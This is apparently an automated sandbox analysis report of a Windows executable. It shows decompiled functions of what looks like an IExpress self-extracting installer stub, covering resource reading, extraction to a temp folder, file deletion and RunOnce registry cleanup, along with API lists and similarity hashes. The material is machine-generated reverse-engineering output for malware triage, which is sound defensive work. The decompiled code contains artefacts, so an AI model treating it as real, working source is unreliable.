• CreateProcessA.KERNELBASE ref: 00174033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00174049
• GetExitCodeProcess.KERNELBASE ref: 0017405C
• CloseHandle.KERNEL32(?), ref: 0017409C
• CloseHandle.KERNEL32(?), ref: 001740A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001740DC
• FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001740E9
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: f7c013192a69338093dfdb325360d8036b018aa34712940b3abe3edfba172a0b
• Instruction ID: 74138e3bbbb9f1a8a8098ac4c2bf7e28496c4fd25210be3e3f9bc0571da5e9fd
• Opcode Fuzzy Hash: f7c013192a69338093dfdb325360d8036b018aa34712940b3abe3edfba172a0b
• Instruction Fuzzy Hash: BE31CE31681218ABEB209B65DC4CFAB777CEBD4701F6081A9F60DD29A1CB305CC5CB21
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E001751E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0017468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0017468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E001744B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x179124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x179124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x179124 = 0x80070714;
					goto L10;
				}
				E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x179124 = E00176285();
				goto L10;
			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00172F4D,?,00000002,00000000), ref: 00175201
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00175250
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                      • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                    • Opcode ID: 474ef6c75a868ecd4d74d2928133276f9c5ab24d696c300f7df21cf4f01edbdd
                                                                                                                                                                                                    • Instruction ID: a067182e80f3d08e5c73177a4ca4fbac8e04b75f3e7a743e0a8755a1c71fca31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 474ef6c75a868ecd4d74d2928133276f9c5ab24d696c300f7df21cf4f01edbdd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 141104B1344601BBE3146B715C89F3B61BEEFD9390B91C439F64ED6591EBB98C805134
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                    			E001752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR** _t31;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                                                    				_t9 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                    				_t31 =  *0x1791e0; // 0x33c7230
                                                                                                                                                                                                    				if(_t31 != 0) {
                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t29 = _t31;
                                                                                                                                                                                                    						if( *0x178a24 == 0 &&  *0x179a30 == 0) {
                                                                                                                                                                                                    							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                    							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t31 = _t31[1];
                                                                                                                                                                                                    						LocalFree( *_t29);
                                                                                                                                                                                                    						LocalFree(_t29);
                                                                                                                                                                                                    					} while (_t31 != 0);
                                                                                                                                                                                                    					_pop(_t28);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 =  *0x178a20; // 0x0
                                                                                                                                                                                                    				_pop(_t32);
                                                                                                                                                                                                    				if(_t11 != 0 &&  *0x178a24 == 0 &&  *0x179a30 == 0) {
                                                                                                                                                                                                    					_push(_t22);
                                                                                                                                                                                                    					E00171781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    					if(( *0x179a34 & 0x00000020) != 0) {
                                                                                                                                                                                                    						E001765E8( &_v268);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                    					_t22 =  &_v268;
                                                                                                                                                                                                    					E00172390( &_v268);
                                                                                                                                                                                                    					_t11 =  *0x178a20; // 0x0
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if( *0x179a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                    					_t11 = E00171FE1(_t22); // executed
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				 *0x178a20 =  *0x178a20 & 0x00000000;
                                                                                                                                                                                                    				return E00176CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                    			}

                                                                                                                                                                                                    0x001752b6
                                                                                                                                                                                                    0x001752b6
                                                                                                                                                                                                    0x001752b6
                                                                                                                                                                                                    0x001752c1
                                                                                                                                                                                                    0x001752c8
                                                                                                                                                                                                    0x001752cb
                                                                                                                                                                                                    0x001752cc
                                                                                                                                                                                                    0x001752d4
                                                                                                                                                                                                    0x001752d6
                                                                                                                                                                                                    0x001752d7
                                                                                                                                                                                                    0x001752de
                                                                                                                                                                                                    0x001752e0
                                                                                                                                                                                                    0x001752f2
                                                                                                                                                                                                    0x001752fa
                                                                                                                                                                                                    0x001752fa
                                                                                                                                                                                                    0x00175302
                                                                                                                                                                                                    0x00175305
                                                                                                                                                                                                    0x0017530c
                                                                                                                                                                                                    0x00175312
                                                                                                                                                                                                    0x00175316
                                                                                                                                                                                                    0x00175316
                                                                                                                                                                                                    0x00175317
                                                                                                                                                                                                    0x0017531c
                                                                                                                                                                                                    0x0017531f
                                                                                                                                                                                                    0x00175333
                                                                                                                                                                                                    0x00175345
                                                                                                                                                                                                    0x00175351
                                                                                                                                                                                                    0x00175359
                                                                                                                                                                                                    0x00175359
                                                                                                                                                                                                    0x00175363
                                                                                                                                                                                                    0x00175369
                                                                                                                                                                                                    0x0017536f
                                                                                                                                                                                                    0x00175374
                                                                                                                                                                                                    0x00175374
                                                                                                                                                                                                    0x00175381
                                                                                                                                                                                                    0x00175387
                                                                                                                                                                                                    0x00175387
                                                                                                                                                                                                    0x0017538f
                                                                                                                                                                                                    0x001753a0

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(033C7230,00000080,?,00000000), ref: 001752F2
                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(033C7230), ref: 001752FA
                                                                                                                                                                                                    • LocalFree.KERNEL32(033C7230,?,00000000), ref: 00175305
                                                                                                                                                                                                    • LocalFree.KERNEL32(033C7230), ref: 0017530C
                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(001711FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00175363
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00175334
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    • API String ID: 2833751637-2312194364
                                                                                                                                                                                                    • Opcode ID: 9d15bd2042702d2df3758a4b1327bd6097580ddbd7d1ee82269cb7531e13fbf8
                                                                                                                                                                                                    • Instruction ID: da014892ab2e22e953810bde680b92714f00b8ed3ec3126a536e34a4c3d49a0c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d15bd2042702d2df3758a4b1327bd6097580ddbd7d1ee82269cb7531e13fbf8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B21FD31941A14DBDB20AB24EC09B6937B5BB54791F448669F88E579B0CFF09DC8CB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00171FE1(void* __ecx) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if( *0x178530 != 0) {
                                                                                                                                                                                                    					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                    					if(_t4 == 0) {
                                                                                                                                                                                                    						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                    						return RegCloseKey(_v8);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                     			}

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0017538C,?,?,0017538C), ref: 00172005
                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0017538C,wextract_cleanup0,?,?,0017538C), ref: 00172017
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0017538C,?,?,0017538C), ref: 00172020
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                     • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                    • API String ID: 849931509-702805525
                                                                                                                                                                                                    • Opcode ID: 7db739ae8fe17884ff227a74272ecbe390e61b81f948a833d3b3c0365badfdbe
                                                                                                                                                                                                    • Instruction ID: cb56f06c9860b034175dd7b6b94e9a9b1b1beb693ae09a219d7ad98c937910f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7db739ae8fe17884ff227a74272ecbe390e61b81f948a833d3b3c0365badfdbe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3E04F34594318BBDB219B90EC0EF5E7B79FB41745F500198F90CA0460EB715AD4D715
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E00174CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				long _t35;
                                                                                                                                                                                                    				long _t36;
                                                                                                                                                                                                    				struct HWND__* _t37;
                                                                                                                                                                                                    				long _t38;
                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                    				long _t41;
                                                                                                                                                                                                    				long _t44;
                                                                                                                                                                                                    				long _t45;
                                                                                                                                                                                                    				long _t46;
                                                                                                                                                                                                    				signed int _t50;
                                                                                                                                                                                                    				long _t51;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				long _t59;
                                                                                                                                                                                                    				char* _t63;
                                                                                                                                                                                                    				long _t64;
                                                                                                                                                                                                    				CHAR* _t71;
                                                                                                                                                                                                    				CHAR* _t74;
                                                                                                                                                                                                    				int _t75;
                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = __edx;
                                                                                                                                                                                                    				_t29 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                    				_v8 = _t30;
                                                                                                                                                                                                    				_t75 = _a8;
                                                                                                                                                                                                    				if( *0x1791d8 == 0) {
                                                                                                                                                                                                    					_t32 = _a4;
                                                                                                                                                                                                    					__eflags = _t32;
                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                    						_t33 = E00174E99(_t75);
                                                                                                                                                                                                    						L35:
                                                                                                                                                                                                    						return E00176CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = _t32 - 1;
                                                                                                                                                                                                    					__eflags = _t35;
                                                                                                                                                                                                    					if(_t35 == 0) {
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						_t33 = 0;
                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t36 = _t35 - 1;
                                                                                                                                                                                                    					__eflags = _t36;
                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                    						_t37 =  *0x178584; // 0x0
                                                                                                                                                                                                    						__eflags = _t37;
                                                                                                                                                                                                    						if(_t37 != 0) {
                                                                                                                                                                                                    							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t54 = 0x1791e4;
                                                                                                                                                                                                    						_t58 = 0x1791e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t38 =  *_t58;
                                                                                                                                                                                                    							_t58 =  &(_t58[1]);
                                                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                                                    						} while (_t38 != 0);
                                                                                                                                                                                                    						_t59 = _t58 - 0x1791e5;
                                                                                                                                                                                                    						__eflags = _t59;
                                                                                                                                                                                                    						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                    						_t73 =  &(_t71[1]);
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t39 =  *_t71;
                                                                                                                                                                                                    							_t71 =  &(_t71[1]);
                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t69 = 0x1791e4;
                                                                                                                                                                                                    						_t30 = E00174702( &_v268, 0x1791e4,  *(_t75 + 4));
                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                    						}
			_t41 = E0017476D( &_v268, __eflags);
			__eflags = _t41;
			if(_t41 == 0) {
				goto L9;
			}
			_push(0x180);
			_t30 = E00174980( &_v268, 0x8302); // executed
			_t75 = _t30;
			__eflags = _t75 - 0xffffffff;
			if(_t75 == 0xffffffff) {
				goto L3;
			}
			_t30 = E001747E0( &_v268);
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			 *0x1793f4 =  *0x1793f4 + 1;
			_t33 = _t75;
			goto L35;
		}
		_t44 = _t36 - 1;
		__eflags = _t44;
		if(_t44 == 0) {
			_t54 = 0x1791e4;
			_t63 = 0x1791e4;
			do {
				_t45 =  *_t63;
				_t63 =  &(_t63[1]);
				__eflags = _t45;
			} while (_t45 != 0);
			_t74 =  *(_t75 + 4);
			_t64 = _t63 - 0x1791e5;
			__eflags = _t64;
			_t69 =  &(_t74[1]);
			do {
				_t46 =  *_t74;
				_t74 =  &(_t74[1]);
				__eflags = _t46;
			} while (_t46 != 0);
			_t73 = _t74 - _t69;
			_t30 = _t64 + 1 + _t74 - _t69;
			__eflags = _t30 - 0x104;
			if(_t30 >= 0x104) {
				goto L3;
			}
			_t69 = 0x1791e4;
			_t30 = E00174702( &_v268, 0x1791e4,  *(_t75 + 4));
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			_t69 =  *((intOrPtr*)(_t75 + 0x18));
			_t30 = E00174C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			}
			E00174B60( *((intOrPtr*)(_t75 + 0x14))); // executed
			_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
			__eflags = _t50;
			if(_t50 != 0) {
				_t51 = _t50 & 0x00000027;
				__eflags = _t51;
			} else {
				_t51 = 0x80;
			}
			_t30 = SetFileAttributesA( &_v268, _t51); // executed
			__eflags = _t30;
			if(_t30 == 0) {
				goto L3;
			} else {
				_t33 = 1;
				goto L35;
			}
		}
		_t30 = _t44 - 1;
		__eflags = _t30;
		if(_t30 == 0) {
			goto L3;
		}
		goto L9;
	}
	if(_a4 == 3) {
		_t30 = E00174B60( *((intOrPtr*)(_t75 + 0x14)));
	}
	goto L3;
}
                                                                                                                                                                                                    0x00174d28
                                                                                                                                                                                                    0x00174d36
                                                                                                                                                                                                    0x00174d3b
                                                                                                                                                                                                    0x00174d40
                                                                                                                                                                                                    0x00174d40
                                                                                                                                                                                                    0x00174d42
                                                                                                                                                                                                    0x00174d43
                                                                                                                                                                                                    0x00174d43
                                                                                                                                                                                                    0x00174d47
                                                                                                                                                                                                    0x00174d4a
                                                                                                                                                                                                    0x00174d4a
                                                                                                                                                                                                    0x00174d4c
                                                                                                                                                                                                    0x00174d4f
                                                                                                                                                                                                    0x00174d4f
                                                                                                                                                                                                    0x00174d51
                                                                                                                                                                                                    0x00174d52
                                                                                                                                                                                                    0x00174d52
                                                                                                                                                                                                    0x00174d56
                                                                                                                                                                                                    0x00174d5b
                                                                                                                                                                                                    0x00174d5d
                                                                                                                                                                                                    0x00174d62
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d67
                                                                                                                                                                                                    0x00174d6f
                                                                                                                                                                                                    0x00174d74
                                                                                                                                                                                                    0x00174d76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d7c
                                                                                                                                                                                                    0x00174d84
                                                                                                                                                                                                    0x00174d89
                                                                                                                                                                                                    0x00174d8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d94
                                                                                                                                                                                                    0x00174d99
                                                                                                                                                                                                    0x00174d9e
                                                                                                                                                                                                    0x00174da1
                                                                                                                                                                                                    0x00174daa
                                                                                                                                                                                                    0x00174daa
                                                                                                                                                                                                    0x00174da3
                                                                                                                                                                                                    0x00174da3
                                                                                                                                                                                                    0x00174da3
                                                                                                                                                                                                    0x00174db5
                                                                                                                                                                                                    0x00174dbb
                                                                                                                                                                                                    0x00174dbd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174dc3
                                                                                                                                                                                                    0x00174dc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174dc5
                                                                                                                                                                                                    0x00174dbd
                                                                                                                                                                                                    0x00174d2a
                                                                                                                                                                                                    0x00174d2a
                                                                                                                                                                                                    0x00174d2d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174d2d
                                                                                                                                                                                                    0x00174cf8
                                                                                                                                                                                                    0x00174cfd
                                                                                                                                                                                                    0x00174d02
                                                                                                                                                                                                    0x00000000

APIs
• SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00174DB5
• SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00174DDD
Strings
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: AttributesFileItemText
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 3625706803-2312194364
• Opcode ID: 0dbb9821f3310e76a8d9fb498b8bb41c4be81350a6782508418370dc3b9755c2
• Instruction ID: 22829e3761c393ed425a24dfa1adf3f039ebf1281f873a41ccb6858a659b3ea4
• Opcode Fuzzy Hash: 0dbb9821f3310e76a8d9fb498b8bb41c4be81350a6782508418370dc3b9755c2
• Instruction Fuzzy Hash: B54120362001018BCB359FB8DE446F973B9AB65350B04C668E8CE976A1DF71DE8AC750
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00174C37(signed int __ecx, int __edx, int _a4) {
	struct _FILETIME _v12;
	struct _FILETIME _v20;
	FILETIME* _t14;
	int _t15;
	signed int _t21;

	_t21 = __ecx * 0x18;
	if( *((intOrPtr*)(_t21 + 0x178d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
		L5:
		return 0;
	} else {
		_t14 =  &_v12;
		_t15 = SetFileTime( *(_t21 + 0x178d74), _t14, _t14, _t14); // executed
		if(_t15 == 0) {
			goto L5;
		}
		return 1;
	}
}

Instruction addresses:
0x00174c40 0x00174c4a 0x00174c8d 0x00000000 0x00174c70 0x00174c70 0x00174c7e 0x00174c86
0x00000000 0x00000000 0x00000000 0x00174c8a

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32 ref: 00174C54
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00174C66
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00174C7E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Time$File$DateLocal
• String ID:
• API String ID: 2071732420-0
• Opcode ID: a94eafbfcdeaf1b777672393ac4d29509cb14211efb437749d692c58fbb8e255
• Instruction ID: b70071991febc000dedd09febca5a306dc661fc945b430b9a39d754bb3e24b40
• Opcode Fuzzy Hash: a94eafbfcdeaf1b777672393ac4d29509cb14211efb437749d692c58fbb8e255
• Instruction Fuzzy Hash: 42F0907264120CAFAB25DFB4CC48DBF77BCEB44350B84852AA82DC1050EB30D994C7A0
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 75%
E0017487A(CHAR* __ecx, signed int __edx) {
	void* _t7;
	CHAR* _t11;
	long _t18;
	long _t23;

	_t11 = __ecx;
	asm("sbb edi, edi");
	_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
	if((__edx & 0x00000100) == 0) {
		asm("sbb esi, esi");
		_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
	} else {
		if((__edx & 0x00000400) == 0) {
			asm("sbb esi, esi");
			_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
		} else {
			_t23 = 1;
		}
	}
	_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
	if(_t7 != 0xffffffff || _t23 == 3) {
		return _t7;
	} else {
		E0017490C(_t11);
		return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
	}
}

